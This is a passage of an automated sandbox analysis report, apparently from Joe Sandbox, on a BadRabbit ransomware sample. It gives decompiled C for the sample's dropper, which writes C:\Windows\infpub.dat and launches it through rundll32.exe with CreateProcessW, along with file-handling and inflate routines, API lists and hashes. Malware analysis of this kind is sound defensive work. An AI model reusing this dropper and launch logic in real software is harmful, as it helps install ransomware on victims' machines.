                                                                                                          										_t52 =  &_v4716;
                                                                                                          										do {
                                                                                                          											 *_t52 = 0;
                                                                                                          											_t52 = _t52 + 1;
                                                                                                          											_t69 = _t69 - 1;
                                                                                                          										} while (_t69 != 0);
                                                                                                          										_t70 = 0x44;
                                                                                                          										_t53 =  &_v4784;
                                                                                                          										do {
                                                                                                          											 *_t53 = 0;
                                                                                                          											_t53 = _t53 + 1;
                                                                                                          											_t70 = _t70 - 1;
                                                                                                          										} while (_t70 != 0);
                                                                                                          										_t73 =  &_v1568;
                                                                                                          										_v4784.cb = 0x44;
                                                                                                          										CreateProcessW( &_v1568,  &_v3128, _t70, _t70, _t70, 0x8000000, _t70, _t70,  &_v4784,  &_v4716); // executed
                                                                                                          										ExitProcess(0); // executed
                                                                                                          									}
                                                                                                          								}
                                                                                                          							}
                                                                                                          						}
                                                                                                          					}
                                                                                                          				}
                                                                                                          				return E00881499(0, _t57, _v8 ^ _t80, _t73, _t78, _t79);
                                                                                                          			}

































                                                                                                          0x008812c0
                                                                                                          0x008812c8
                                                                                                          0x008812d4
                                                                                                          0x008812d8
                                                                                                          0x008812e1
                                                                                                          0x008812e5
                                                                                                          0x008812f2
                                                                                                          0x00881305
                                                                                                          0x00881309
                                                                                                          0x00881316
                                                                                                          0x0088133d
                                                                                                          0x00881343
                                                                                                          0x00881345
                                                                                                          0x00881348
                                                                                                          0x00881350
                                                                                                          0x00881350
                                                                                                          0x00881353
                                                                                                          0x00881356
                                                                                                          0x0088135d
                                                                                                          0x00881364
                                                                                                          0x00881367
                                                                                                          0x00881369
                                                                                                          0x00881369
                                                                                                          0x00881370
                                                                                                          0x00881372
                                                                                                          0x00881372
                                                                                                          0x0088137b
                                                                                                          0x00881380
                                                                                                          0x00881380
                                                                                                          0x00881383
                                                                                                          0x00881387
                                                                                                          0x0088138a
                                                                                                          0x00881318
                                                                                                          0x00881318
                                                                                                          0x00881320
                                                                                                          0x00881320
                                                                                                          0x00881320
                                                                                                          0x00881327
                                                                                                          0x0088132f
                                                                                                          0x00881332
                                                                                                          0x00881337
                                                                                                          0x008813a3
                                                                                                          0x008813ae
                                                                                                          0x008813bd
                                                                                                          0x008813d0
                                                                                                          0x008813d7
                                                                                                          0x008813eb
                                                                                                          0x008813f0
                                                                                                          0x008813f3
                                                                                                          0x00881418
                                                                                                          0x00881421
                                                                                                          0x00881426
                                                                                                          0x00881430
                                                                                                          0x00881430
                                                                                                          0x00881433
                                                                                                          0x00881434
                                                                                                          0x00881434
                                                                                                          0x00881437
                                                                                                          0x0088143c
                                                                                                          0x00881442
                                                                                                          0x00881442
                                                                                                          0x00881445
                                                                                                          0x00881446
                                                                                                          0x00881446
                                                                                                          0x00881468
                                                                                                          0x0088146f
                                                                                                          0x00881479
                                                                                                          0x00881481
                                                                                                          0x00881481
                                                                                                          0x008813f3
                                                                                                          0x008813d7
                                                                                                          0x008813bd
                                                                                                          0x008813a3
                                                                                                          0x00881309
                                                                                                          0x00881498

                                                                                                          APIs
                                                                                                          • GetCommandLineW.KERNEL32 ref: 008812DF
                                                                                                          • GetCommandLineW.KERNEL32 ref: 008812FC
                                                                                                          • CommandLineToArgvW.SHELL32(00000000), ref: 008812FF
                                                                                                          • wcsstr.MSVCRT ref: 0088133D
                                                                                                          • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 0088139B
                                                                                                          • lstrcatW.KERNEL32(?,\rundll32.exe), ref: 008813B5
                                                                                                          • wsprintfW.USER32 ref: 00881418
                                                                                                          • CreateProcessW.KERNELBASE ref: 00881479
                                                                                                          • ExitProcess.KERNEL32 ref: 00881481
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000001.00000002.328686156.0000000000881000.00000020.00000001.01000000.00000006.sdmp, Offset: 00880000, based on PE: true
                                                                                                          • Associated: 00000001.00000002.328679067.0000000000880000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 00000001.00000002.328695785.0000000000884000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 00000001.00000002.328877255.0000000000889000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_1_2_880000_Endermanch@BadRabbit.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CommandLine$Process$ArgvCreateDirectoryExitSystemlstrcatwcsstrwsprintf
                                                                                                          • String ID: %ws C:\Windows\%ws,#1 %ws$D$\rundll32.exe$infpub.dat
                                                                                                          • API String ID: 39178828-1758013632
                                                                                                          • Opcode ID: e9c0fdd6ea053c1d26fe9b5f007dd04748d1b09628614ec84a4a9e4bddd100b5
                                                                                                          • Instruction ID: 03d4c2754671b972e6a32407028558dba131cd1a2eadf04a3bd22aca3eeaef2c
                                                                                                          • Opcode Fuzzy Hash: e9c0fdd6ea053c1d26fe9b5f007dd04748d1b09628614ec84a4a9e4bddd100b5
                                                                                                          • Instruction Fuzzy Hash: 5341D1729002199BCF24EB98CC99BEA737DFF44300F044199EA0AD7250EF74AE65CB61
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E00881000(WCHAR* __eax, void** _a4, long* _a8) {
                                                                                                          				long _v8;
                                                                                                          				DWORD* _v12;
                                                                                                          				void* _t11;
                                                                                                          				void* _t17;
                                                                                                          				long _t18;
                                                                                                          				void* _t24;
                                                                                                          				void* _t28;
                                                                                                          				long _t32;
                                                                                                          
                                                                                                          				_v12 = 0;
                                                                                                          				_t11 = CreateFileW(__eax, 0x80000000, 1, 0, 3, 0, 0); // executed
                                                                                                          				_t24 = _t11;
                                                                                                          				if(_t24 == 0xffffffff) {
                                                                                                          					return 0;
                                                                                                          				} else {
                                                                                                          					_t32 = GetFileSize(_t24, 0);
                                                                                                          					if(_t32 == 0) {
                                                                                                          						L8:
                                                                                                          						FindCloseChangeNotification(_t24); // executed
                                                                                                          						return _v12;
                                                                                                          					} else {
                                                                                                          						_t17 = RtlAllocateHeap(GetProcessHeap(), 0, _t32); // executed
                                                                                                          						_t28 = _t17;
                                                                                                          						if(_t28 == 0) {
                                                                                                          							L7:
                                                                                                          							goto L8;
                                                                                                          						} else {
                                                                                                          							_v8 = 0;
                                                                                                          							_t18 = ReadFile(_t24, _t28, _t32,  &_v8, 0); // executed
                                                                                                          							if(_t18 != 0 || _v8 != _t32) {
                                                                                                          								 *_a4 = _t28;
                                                                                                          								 *_a8 = _t32;
                                                                                                          								_v12 = 1;
                                                                                                          								goto L7;
                                                                                                          							} else {
                                                                                                          								HeapFree(GetProcessHeap(), _t18, _t28);
                                                                                                          								CloseHandle(_t24);
                                                                                                          								return _v12;
                                                                                                          							}
                                                                                                          						}
                                                                                                          					}
                                                                                                          				}
                                                                                                          			}











                                                                                                          0x00881017
                                                                                                          0x0088101a
                                                                                                          0x00881020
                                                                                                          0x00881025
                                                                                                          0x008810bc
                                                                                                          0x0088102b
                                                                                                          0x00881033
                                                                                                          0x00881037
                                                                                                          0x008810a3
                                                                                                          0x008810a4
                                                                                                          0x008810b2
                                                                                                          0x00881039
                                                                                                          0x00881044
                                                                                                          0x0088104a
                                                                                                          0x0088104e
                                                                                                          0x008810a2
                                                                                                          0x00000000
                                                                                                          0x00881050
                                                                                                          0x00881059
                                                                                                          0x00881060
                                                                                                          0x00881068
                                                                                                          0x00881097
                                                                                                          0x00881099
                                                                                                          0x0088109b
                                                                                                          0x00000000
                                                                                                          0x0088106f
                                                                                                          0x00881078
                                                                                                          0x00881080
                                                                                                          0x0088108e
                                                                                                          0x0088108e
                                                                                                          0x00881068
                                                                                                          0x0088104e
                                                                                                          0x00881037

                                                                                                          APIs
                                                                                                          • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?), ref: 0088101A
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?), ref: 0088102D
                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 0088103D
                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,?,?), ref: 00881044
                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?), ref: 00881060
                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,?), ref: 00881071
                                                                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 00881078
                                                                                                          • CloseHandle.KERNEL32(00000000,?), ref: 00881080
                                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?), ref: 008810A4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000001.00000002.328686156.0000000000881000.00000020.00000001.01000000.00000006.sdmp, Offset: 00880000, based on PE: true
                                                                                                          • Associated: 00000001.00000002.328679067.0000000000880000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 00000001.00000002.328695785.0000000000884000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 00000001.00000002.328877255.0000000000889000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_1_2_880000_Endermanch@BadRabbit.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$File$CloseProcess$AllocateChangeCreateFindFreeHandleNotificationReadSize
                                                                                                          • String ID: Uqt
                                                                                                          • API String ID: 631125692-2320327147
                                                                                                          • Opcode ID: 74ce318e90f2bef671a12327b03be82683e5749094244b41dc5b7ea767d7719e
                                                                                                          • Instruction ID: 81b7807e8545721422fa959c08e513c6ed6d0a6b66a12bb868b1566a77f644db
                                                                                                          • Opcode Fuzzy Hash: 74ce318e90f2bef671a12327b03be82683e5749094244b41dc5b7ea767d7719e
                                                                                                          • Instruction Fuzzy Hash: 96218E72A01615ABC770ABAAAC4CF9BBF6CFB45762F100145FA09D2240DA318981D7A0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 72 881260-881282 CreateFileW 73 8812aa-8812af 72->73 74 881284-881297 WriteFile 72->74 75 881299-88129c 74->75 76 8812a3-8812a4 FindCloseChangeNotification 74->76 75->76 77 88129e 75->77 76->73 77->76
                                                                                                          C-Code - Quality: 100%
                                                                                                          			E00881260(long __ebx, long _a4) {
                                                                                                          				void* _t4;
                                                                                                          				int _t7;
                                                                                                          				struct _OVERLAPPED* _t11;
                                                                                                          				void* _t12;
                                                                                                          
                                                                                                          				_t11 = 0;
                                                                                                          				_t4 = CreateFileW(L"C:\\Windows\\infpub.dat", 0x40000000, 0, 0, 2, 0, 0); // executed
                                                                                                          				_t12 = _t4;
                                                                                                          				if(_t12 != 0xffffffff) {
                                                                                                          					_t7 = WriteFile(_t12, _a4, __ebx,  &_a4, 0); // executed
                                                                                                          					if(_t7 != 0 && _a4 == __ebx) {
                                                                                                          						_t11 = 1;
                                                                                                          					}
                                                                                                          					FindCloseChangeNotification(_t12); // executed
                                                                                                          				}
                                                                                                          				return _t11;
                                                                                                          			}







                                                                                                          0x00881265
                                                                                                          0x00881277
                                                                                                          0x0088127d
                                                                                                          0x00881282
                                                                                                          0x0088128f
                                                                                                          0x00881297
                                                                                                          0x0088129e
                                                                                                          0x0088129e
                                                                                                          0x008812a4
                                                                                                          0x008812a4
                                                                                                          0x008812af

                                                                                                          APIs
                                                                                                          • CreateFileW.KERNELBASE(C:\Windows\infpub.dat,40000000,00000000,00000000,00000002,00000000,00000000,00000000,?,?,008813F0,?,?,?), ref: 00881277
                                                                                                          • WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,008813F0,?,?,?), ref: 0088128F
                                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,008813F0,?,?,?), ref: 008812A4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000001.00000002.328686156.0000000000881000.00000020.00000001.01000000.00000006.sdmp, Offset: 00880000, based on PE: true
                                                                                                          • Associated: 00000001.00000002.328679067.0000000000880000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 00000001.00000002.328695785.0000000000884000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 00000001.00000002.328877255.0000000000889000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_1_2_880000_Endermanch@BadRabbit.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$ChangeCloseCreateFindNotificationWrite
                                                                                                          • String ID: C:\Windows\infpub.dat
                                                                                                          • API String ID: 3805958096-2284094909
                                                                                                          • Opcode ID: 9d81350da7021872a088bc4d3f5c7334763aad1a9dc9d2ef5abdcb99ab61c605
                                                                                                          • Instruction ID: 2d7436f972e24e5695aa92faff7c22ee26a32d8f3c3c1c7ee583915529de851f
                                                                                                          • Opcode Fuzzy Hash: 9d81350da7021872a088bc4d3f5c7334763aad1a9dc9d2ef5abdcb99ab61c605
                                                                                                          • Instruction Fuzzy Hash: 9CF01C76A015167ADB206A5AEC4CF9B3E6CFBC6BA1F104129FA15C6180EA609D52C7B0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 120 883393-8833a5 malloc
                                                                                                          C-Code - Quality: 100%
                                                                                                          			E00883393(signed int _a8, signed int _a12) {
                                                                                                          				void* _t5;
                                                                                                          
                                                                                                          				_t5 = malloc(_a8 * _a12); // executed
                                                                                                          				return _t5;
                                                                                                          			}




                                                                                                          0x0088339e
                                                                                                          0x008833a5

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000001.00000002.328686156.0000000000881000.00000020.00000001.01000000.00000006.sdmp, Offset: 00880000, based on PE: true
                                                                                                          • Associated: 00000001.00000002.328679067.0000000000880000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 00000001.00000002.328695785.0000000000884000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 00000001.00000002.328877255.0000000000889000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_1_2_880000_Endermanch@BadRabbit.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 2803490479-0
                                                                                                          • Opcode ID: e556b537d4fe67859f682bc138546e7994fb1432b70124257811653e42ab8f21
                                                                                                          • Instruction ID: b4e1fb631630280c32447b85fc2e7a5308fef5ca1091904c8f6e312ad5e1d59d
                                                                                                          • Opcode Fuzzy Hash: e556b537d4fe67859f682bc138546e7994fb1432b70124257811653e42ab8f21
                                                                                                          • Instruction Fuzzy Hash: A5B0923204834D5B8F04EE99A98A89A73DCEA64620B444406F92C8B541E931F5114659
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 76%
                                                                                                          			E0088201D(signed int* __ebx, signed int __ecx, unsigned int __edx, signed int __edi, signed char** __esi) {
                                                                                                          				signed int _t753;
                                                                                                          				signed int _t785;
                                                                                                          				signed int _t787;
                                                                                                          				signed int _t792;
                                                                                                          				signed int _t793;
                                                                                                          				signed int _t796;
                                                                                                          				signed int _t800;
                                                                                                          				signed int* _t920;
                                                                                                          				signed int _t928;
                                                                                                          				signed int _t935;
                                                                                                          				void* _t940;
                                                                                                          				unsigned int _t1054;
                                                                                                          				signed int _t1055;
                                                                                                          				signed int _t1056;
                                                                                                          				signed int _t1060;
                                                                                                          				signed int _t1103;
                                                                                                          				intOrPtr _t1105;
                                                                                                          				signed int _t1106;
                                                                                                          				signed char** _t1125;
                                                                                                          				intOrPtr* _t1127;
                                                                                                          				void* _t1164;
                                                                                                          
                                                                                                          				L0:
                                                                                                          				while(1) {
                                                                                                          					L0:
                                                                                                          					_t1125 = __esi;
                                                                                                          					_t1103 = __edi;
                                                                                                          					_t1054 = __edx;
                                                                                                          					_t928 = __ecx;
                                                                                                          					_t920 = __ebx;
                                                                                                          					if(__edi >= 0xe) {
                                                                                                          						goto L180;
                                                                                                          					}
                                                                                                          					L177:
                                                                                                          					__eax =  *(__ebp - 8);
                                                                                                          					while(1) {
                                                                                                          						L178:
                                                                                                          						if(__ecx == 0) {
                                                                                                          							break;
                                                                                                          						}
                                                                                                          						L179:
                                                                                                          						__eax =  *__eax & 0x000000ff;
                                                                                                          						 *(__ebp - 4) = __ecx;
                                                                                                          						__ecx = __edi;
                                                                                                          						__eax = __eax << __cl;
                                                                                                          						__edi = __edi + 8;
                                                                                                          						__ecx =  *(__ebp - 4);
                                                                                                          						__edx = __edx + __eax;
                                                                                                          						__eax =  *(__ebp - 8);
                                                                                                          						__eax =  *(__ebp - 8) + 1;
                                                                                                          						 *(__ebp - 0xc) = __edx;
                                                                                                          						 *(__ebp - 8) = __eax;
                                                                                                          						if(__edi < 0xe) {
                                                                                                          							continue;
                                                                                                          						}
                                                                                                          						goto L180;
                                                                                                          					}
                                                                                                          					L322:
                                                                                                          					_t935 =  *(_t1164 - 4);
                                                                                                          					L323:
                                                                                                          					_t712 = _t1164 + 8; // 0x38
                                                                                                          					_t1127 =  *_t712;
                                                                                                          					 *(_t1127 + 0xc) =  *(_t1164 - 0x1c);
                                                                                                          					_t716 = _t1164 - 8; // 0x38
                                                                                                          					 *(_t1127 + 0x10) =  *(_t1164 - 0x18);
                                                                                                          					_t1060 = 0;
                                                                                                          					 *_t1127 =  *_t716;
                                                                                                          					 *(_t1127 + 4) = _t935;
                                                                                                          					_t920[0xf] = _t1103;
                                                                                                          					_t1105 =  *((intOrPtr*)(_t1164 - 0x28));
                                                                                                          					_t920[0xe] =  *(_t1164 - 0xc);
                                                                                                          					if(_t920[0xa] != 0) {
                                                                                                          						L328:
                                                                                                          						_t785 = E00882DCB(_t1127,  *(_t1127 + 0xc), _t1105 -  *(_t1127 + 0x10));
                                                                                                          						if(_t785 == 0) {
                                                                                                          							L331:
                                                                                                          							_t1060 = 0;
                                                                                                          							L332:
                                                                                                          							_t787 =  *(_t1164 - 0x38) -  *(_t1127 + 4);
                                                                                                          							_t1106 = _t1105 -  *(_t1127 + 0x10);
                                                                                                          							 *((intOrPtr*)(_t1127 + 8)) =  *((intOrPtr*)(_t1127 + 8)) + _t787;
                                                                                                          							 *((intOrPtr*)(_t1127 + 0x14)) =  *((intOrPtr*)(_t1127 + 0x14)) + _t1106;
                                                                                                          							_t920[7] = _t920[7] + _t1106;
                                                                                                          							 *(_t1164 - 0x38) = _t787;
                                                                                                          							if(_t920[2] != _t1060) {
                                                                                                          								if(_t1106 != 0) {
                                                                                                          									_push(_t1106);
                                                                                                          									_push( *(_t1127 + 0xc) - _t1106);
                                                                                                          									_push(_t920[6]);
                                                                                                          									if(_t920[4] == _t1060) {
                                                                                                          										_t796 = E00882E91();
                                                                                                          									} else {
                                                                                                          										_t796 = E008830C1();
                                                                                                          									}
                                                                                                          									_t920[6] = _t796;
                                                                                                          									_t1060 = 0;
                                                                                                          									 *(_t1127 + 0x30) = _t796;
                                                                                                          								}
                                                                                                          							}
                                                                                                          							if( *_t920 == 0x13) {
                                                                                                          								L340:
                                                                                                          								_t1060 = 0x100;
                                                                                                          								goto L341;
                                                                                                          							} else {
                                                                                                          								L339:
                                                                                                          								if( *_t920 != 0xe) {
                                                                                                          									L341:
                                                                                                          									 *(_t1164 + 8) = 0x80;
                                                                                                          									asm("sbb ecx, ecx");
                                                                                                          									_t789 =  ==  ?  *(_t1164 + 8) : 0;
                                                                                                          									_t790 = ( ==  ?  *(_t1164 + 8) : 0) + ( ~(_t920[1]) & 0x00000040) + _t1060;
                                                                                                          									_t791 = ( ==  ?  *(_t1164 + 8) : 0) + ( ~(_t920[1]) & 0x00000040) + _t1060 + _t920[0xf];
                                                                                                          									 *((intOrPtr*)(_t1127 + 0x2c)) = ( ==  ?  *(_t1164 + 8) : 0) + ( ~(_t920[1]) & 0x00000040) + _t1060 + _t920[0xf];
                                                                                                          									if( *(_t1164 - 0x38) != 0) {
                                                                                                          										L343:
                                                                                                          										if( *((intOrPtr*)(_t1164 + 0xc)) != 4) {
                                                                                                          											L345:
                                                                                                          											_t792 =  *(_t1164 - 0x20);
                                                                                                          											L138:
                                                                                                          											return _t792;
                                                                                                          										}
                                                                                                          										L344:
                                                                                                          										_t793 =  *(_t1164 - 0x20);
                                                                                                          										_t940 = 0xfffffffb;
                                                                                                          										_t792 =  ==  ? _t940 : _t793;
                                                                                                          										goto L138;
                                                                                                          									}
                                                                                                          									L342:
                                                                                                          									if(_t1106 == 0) {
                                                                                                          										goto L344;
                                                                                                          									}
                                                                                                          									goto L343;
                                                                                                          								}
                                                                                                          								goto L340;
                                                                                                          							}
                                                                                                          						}
                                                                                                          						L329:
                                                                                                          						 *_t920 = 0x1e;
                                                                                                          						L330:
                                                                                                          						_push(0xfffffffc);
                                                                                                          						L137:
                                                                                                          						_pop(_t792);
                                                                                                          						goto L138;
                                                                                                          					}
                                                                                                          					L324:
                                                                                                          					if(_t1105 ==  *(_t1127 + 0x10)) {
                                                                                                          						goto L332;
                                                                                                          					}
                                                                                                          					L325:
                                                                                                          					if( *_t920 >= 0x1d) {
                                                                                                          						goto L332;
                                                                                                          					}
                                                                                                          					L326:
                                                                                                          					if( *_t920 < 0x1a) {
                                                                                                          						goto L328;
                                                                                                          					}
                                                                                                          					L327:
                                                                                                          					if( *((intOrPtr*)(_t1164 + 0xc)) == 4) {
                                                                                                          						goto L332;
                                                                                                          					}
                                                                                                          					goto L328;
                                                                                                          					L180:
                                                                                                          					_t1103 = _t1103 - 0xe;
                                                                                                          					_t1055 = _t1054 >> 5;
                                                                                                          					 *(_t1164 - 0x10) = _t1103;
                                                                                                          					_t920[0x18] = (_t1054 & 0x0000001f) + 0x101;
                                                                                                          					_t1056 = _t1055 >> 5;
                                                                                                          					_t920[0x19] = (_t1055 & 0x0000001f) + 1;
                                                                                                          					_t1054 = _t1056 >> 4;
                                                                                                          					 *(_t1164 - 0xc) = _t1054;
                                                                                                          					_t920[0x17] = (_t1056 & 0x0000000f) + 4;
                                                                                                          					if(_t920[0x18] > 0x11e) {
                                                                                                          						L183:
                                                                                                          						_t1125[6] = "too many length or distance symbols";
                                                                                                          						L31:
                                                                                                          						 *_t920 = 0x1d;
                                                                                                          						while(1) {
                                                                                                          							L135:
                                                                                                          							_t753 =  *_t920;
                                                                                                          							if(_t753 > 0x1e) {
                                                                                                          								break;
                                                                                                          							}
                                                                                                          							L1:
                                                                                                          							switch( *((intOrPtr*)(_t753 * 4 +  &M00882B54))) {
                                                                                                          								case 0:
                                                                                                          									L2:
                                                                                                          									if(_t920[2] != 0) {
                                                                                                          										L4:
                                                                                                          										_push(0x10);
                                                                                                          										_pop(_t763);
                                                                                                          										__eflags = _t1103 - _t763;
                                                                                                          										if(_t1103 >= _t763) {
                                                                                                          											L8:
                                                                                                          											__eflags = _t920[2] & 0x00000002;
                                                                                                          											if((_t920[2] & 0x00000002) == 0) {
                                                                                                          												L11:
                                                                                                          												_t920[4] = _t920[4] & 0x00000000;
                                                                                                          												_t764 = _t920[8];
                                                                                                          												__eflags = _t764;
                                                                                                          												if(_t764 != 0) {
                                                                                                          													_t25 = _t764 + 0x30;
                                                                                                          													 *_t25 =  *(_t764 + 0x30) | 0xffffffff;
                                                                                                          													__eflags =  *_t25;
                                                                                                          												}
                                                                                                          												L13:
                                                                                                          												__eflags = _t920[2] & 0x00000001;
                                                                                                          												if((_t920[2] & 0x00000001) == 0) {
                                                                                                          													L24:
                                                                                                          													_t1125[6] = "incorrect header check";
                                                                                                          													goto L17;
                                                                                                          												}
                                                                                                          												L14:
                                                                                                          												_t767 = (_t1054 >> 8) + ((_t1054 & 0x000000ff) << 8);
                                                                                                          												_push(0x1f);
                                                                                                          												_pop(_t931);
                                                                                                          												__eflags = _t767 % _t931;
                                                                                                          												_t1054 =  *(_t1164 - 0xc);
                                                                                                          												if(_t767 % _t931 != 0) {
                                                                                                          													goto L24;
                                                                                                          												}
                                                                                                          												L15:
                                                                                                          												__eflags = (_t1054 & 0x0000000f) - 8;
                                                                                                          												if((_t1054 & 0x0000000f) == 8) {
                                                                                                          													L18:
                                                                                                          													_t1054 = _t1054 >> 4;
                                                                                                          													_t1103 = _t1103 - 4;
                                                                                                          													 *(_t1164 - 0xc) = _t1054;
                                                                                                          													 *(_t1164 - 0x10) = _t1103;
                                                                                                          													_t934 = (_t1054 & 0x0000000f) + 8;
                                                                                                          													__eflags = _t920[9];
                                                                                                          													if(_t920[9] != 0) {
                                                                                                          														L22:
                                                                                                          														__eflags = _t934 - _t920[9];
                                                                                                          														if(_t934 <= _t920[9]) {
                                                                                                          															goto L20;
                                                                                                          														} else {
                                                                                                          															_t1125[6] = "invalid window size";
                                                                                                          															goto L17;
                                                                                                          														}
                                                                                                          													} else {
                                                                                                          														_t920[9] = _t934;
                                                                                                          														L20:
                                                                                                          														_t1103 = 0;
                                                                                                          														_t920[5] = 1 << _t934;
                                                                                                          														_t774 = E00882E91(0, 0, 0);
                                                                                                          														_t920[6] = _t774;
                                                                                                          														_t1125[0xc] = _t774;
                                                                                                          														_t1065 =  !( *(_t1164 - 0xc) >> 8) & 0x00000002 | 0x00000009;
                                                                                                          														__eflags = _t1065;
                                                                                                          														 *_t920 = _t1065;
                                                                                                          														_t1054 = 0;
                                                                                                          														goto L21;
                                                                                                          													}
                                                                                                          												} else {
                                                                                                          													_t1125[6] = "unknown compression method";
                                                                                                          													goto L17;
                                                                                                          												}
                                                                                                          											}
                                                                                                          											L9:
                                                                                                          											__eflags = _t1054 - 0x8b1f;
                                                                                                          											if(_t1054 != 0x8b1f) {
                                                                                                          												goto L11;
                                                                                                          											} else {
                                                                                                          												_t1103 = 0;
                                                                                                          												_t920[6] = E008830C1(0, 0, 0);
                                                                                                          												_push(0x1f);
                                                                                                          												_pop(_t776);
                                                                                                          												 *((char*)(_t1164 - 0x14)) = _t776;
                                                                                                          												 *((char*)(_t1164 - 0x13)) = 0x8b;
                                                                                                          												_t778 = E008830C1(_t920[6], _t1164 - 0x14, 2);
                                                                                                          												_t1054 = 0;
                                                                                                          												_t920[6] = _t778;
                                                                                                          												 *(_t1164 - 0xc) = 0;
                                                                                                          												 *(_t1164 - 0x10) = 0;
                                                                                                          												 *_t920 = 1;
                                                                                                          												goto L134;
                                                                                                          											}
                                                                                                          										} else {
                                                                                                          											_t4 = _t1164 - 8; // 0x38
                                                                                                          											_t779 =  *_t4;
                                                                                                          											while(1) {
                                                                                                          												L6:
                                                                                                          												__eflags = _t928;
                                                                                                          												if(_t928 == 0) {
                                                                                                          													goto L322;
                                                                                                          												}
                                                                                                          												L7:
                                                                                                          												 *(_t1164 - 4) = _t928 - 1;
                                                                                                          												_t798 = ( *_t779 & 0x000000ff) << _t1103;
                                                                                                          												_t1103 = _t1103 + 8;
                                                                                                          												_t928 =  *(_t1164 - 4);
                                                                                                          												_t1054 = _t1054 + _t798;
                                                                                                          												_t7 = _t1164 - 8; // 0x38
                                                                                                          												_t779 =  *_t7 + 1;
                                                                                                          												 *(_t1164 - 0xc) = _t1054;
                                                                                                          												 *(_t1164 - 8) = _t779;
                                                                                                          												 *(_t1164 - 0x10) = _t1103;
                                                                                                          												__eflags = _t1103 - 0x10;
                                                                                                          												if(_t1103 < 0x10) {
                                                                                                          													continue;
                                                                                                          												}
                                                                                                          												goto L8;
                                                                                                          											}
                                                                                                          											goto L322;
                                                                                                          										}
                                                                                                          									} else {
                                                                                                          										 *_t920 = 0xc;
                                                                                                          										goto L135;
                                                                                                          									}
                                                                                                          								case 1:
                                                                                                          									L25:
                                                                                                          									_push(0x10);
                                                                                                          									_pop(__eax);
                                                                                                          									__eflags = __edi - __eax;
                                                                                                          									if(__edi >= __eax) {
                                                                                                          										L29:
                                                                                                          										__ebx[4] = __edx;
                                                                                                          										__eflags = __dl - 8;
                                                                                                          										if(__dl == 8) {
                                                                                                          											L32:
                                                                                                          											__eflags = __edx & 0x0000e000;
                                                                                                          											if((__edx & 0x0000e000) == 0) {
                                                                                                          												L34:
                                                                                                          												__ecx = __ebx[8];
                                                                                                          												__eflags = __ecx;
                                                                                                          												if(__ecx != 0) {
                                                                                                          													__edx = __edx >> 8;
                                                                                                          													__eax = __edx >> 0x00000008 & 0x00000001;
                                                                                                          													__eflags = __eax;
                                                                                                          													 *__ecx = __eax;
                                                                                                          												}
                                                                                                          												__eflags = __ebx[4] & 0x00000200;
                                                                                                          												if((__ebx[4] & 0x00000200) != 0) {
                                                                                                          													 *(__ebp - 0x14) = __dl;
                                                                                                          													__eax = __ebp - 0x14;
                                                                                                          													__eflags = __edx;
                                                                                                          													 *(__ebp - 0x13) = __dl;
                                                                                                          													__ebx[6] = E008830C1(__ebx[6], __ebp - 0x14, 2);
                                                                                                          												}
                                                                                                          												__ecx =  *(__ebp - 4);
                                                                                                          												__eax = 0;
                                                                                                          												__eflags = 0;
                                                                                                          												__edx = 0;
                                                                                                          												 *__ebx = 2;
                                                                                                          												 *(__ebp - 0xc) = 0;
                                                                                                          												__edi = 0;
                                                                                                          												goto L39;
                                                                                                          											}
                                                                                                          											L33:
                                                                                                          											 *(__esi + 0x18) = "unknown header flags set";
                                                                                                          										} else {
                                                                                                          											 *(__esi + 0x18) = "unknown compression method";
                                                                                                          										}
                                                                                                          										goto L31;
                                                                                                          									} else {
                                                                                                          										_t49 = __ebp - 8; // 0x38
                                                                                                          										__eax =  *_t49;
                                                                                                          										while(1) {
                                                                                                          											L27:
